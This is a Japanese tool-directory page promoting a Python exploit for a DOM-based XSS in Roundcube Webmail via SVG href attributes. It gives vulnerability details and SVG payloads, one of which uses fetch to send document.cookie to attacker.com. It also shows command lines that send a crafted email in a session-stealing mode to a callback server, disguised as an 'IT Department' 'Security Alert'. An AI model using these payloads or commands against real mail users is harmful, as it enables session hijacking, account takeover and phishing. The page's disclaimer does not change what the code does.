Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute — Python製のエクスプロイトで、SVGのhref属性を介したRoundcube WebmailのDOMベースXSS(CVE-2026-25916)を対象とし、細工されたメールを通じてセッションハイジャックとデータ窃取を可能にします。 | Kitploit
ツール/GitHubGitHub/mbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティメールセキュリティ
GitHubmbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute

CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute

Python製のエクスプロイトで、SVGのhref属性を介したRoundcube WebmailのDOMベースXSS(CVE-2026-25916)を対象とし、細工されたメールを通じてセッションハイジャックとデータ窃取を可能にします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
31107ヶ月前未レビュー

CVE-2026-25916: Roundcube Webmail DOM XSS エクスプロイト

📋 エクスプロイト情報

エクスプロイトタイトル: Roundcube Webmail DOM XSS via SVG href (CVE-2026-25916)
作成者: Mohammed Idrees Banyamer
連絡先: GitHub @mbanyamer | Instagram @banyamer_security
国: ヨルダン
日付: 2026年2月9日
CVE: CVE-2026-25916
タイプ: DOMベースのクロスサイトスクリプティング(XSS)
プラットフォーム: Webアプリケーション
テスト環境: Roundcube 1.6.8、Ubuntu 22.04
CVSSスコア: 6.1(中)

🚨 法的免責事項

⚠️ 警告: このエクスプロイトは教育目的および許可を得たテスト目的のみで使用してください。
所有しているシステム、または明示的な書面によるテスト許可を得たシステムでのみ使用してください。
作成者は、不正使用または違法行為について一切の責任を負いません。

📖 脆弱性の説明

Roundcube Webmail 1.6.9より前のバージョンには、SVG処理におけるDOMベースのXSS脆弱性が存在します。このアプリケーションはSVG要素内のhrefおよびxlink:href属性を適切にサニタイズできず、特別に細工されたメールを介してJavaScriptが実行される可能性があります。

影響を受けるバージョン: Roundcube Webmail < 1.6.9
修正バージョン: 1.6.9(コミット 26d7677)
CWE: CWE-79 - Webページ生成時の入力の不適切な無害化
攻撃ベクトル: メール経由のリモート攻撃
影響: セッションハイジャック、アカウント乗っ取り、データ流出

🔧 技術的詳細

この脆弱性はrcube_washtml.phpに存在し、SVG要素内のhref属性が適切に検証されていませんでした:

root@kitploit:~
<!-- 脆弱なSVG要素 -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">

```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
root@kitploit:~
python3 cve-2026-25916.py \
  -s smtp.gmail.com \
  -p 587 \
  -u [email protected] \
  -w app_password \
  -r [email protected] \
  -t session_steal \
  --callback https://yourserver.com/collect \
  --subject "Security Alert" \
  --from-name "IT Department"
ツールをダウンロード